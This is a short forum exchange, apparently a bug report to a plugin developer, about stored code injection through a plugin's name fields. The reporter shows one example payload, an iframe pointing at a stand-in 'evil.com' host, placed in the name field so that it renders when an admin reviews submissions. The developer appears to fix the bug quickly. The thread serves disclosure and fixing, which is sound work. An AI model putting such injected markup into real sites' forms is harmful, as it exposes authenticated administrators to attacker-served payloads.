Code injection

It’s code injection, the specifics are in the post request I submitted above

I’m not sure what your having trouble with mate.

https://www.owasp.org/index.php/Code_Injection

if someone supplies html / code in the name fields, when the admin is viewing the submissions it will render the user supplied code.

badguy submits his name as ‘MrEvil <iframe src=”http://evil.com/”>&#8217;

when admin or manager of that plug in reviews the submissions it will treat the <iframe as legitimate code and render it, if evil.com has malicious payloads (java,javascript,flash metasploit whatever, it will get pushed in via iframe attacking authenticated users)

… do you need a video ?

Oh sorry, are there any other types of post requests ?

yes I mean HTTP POST

wicked! that’s probably the quickest turn around I’ve seen to date 🙂

good work!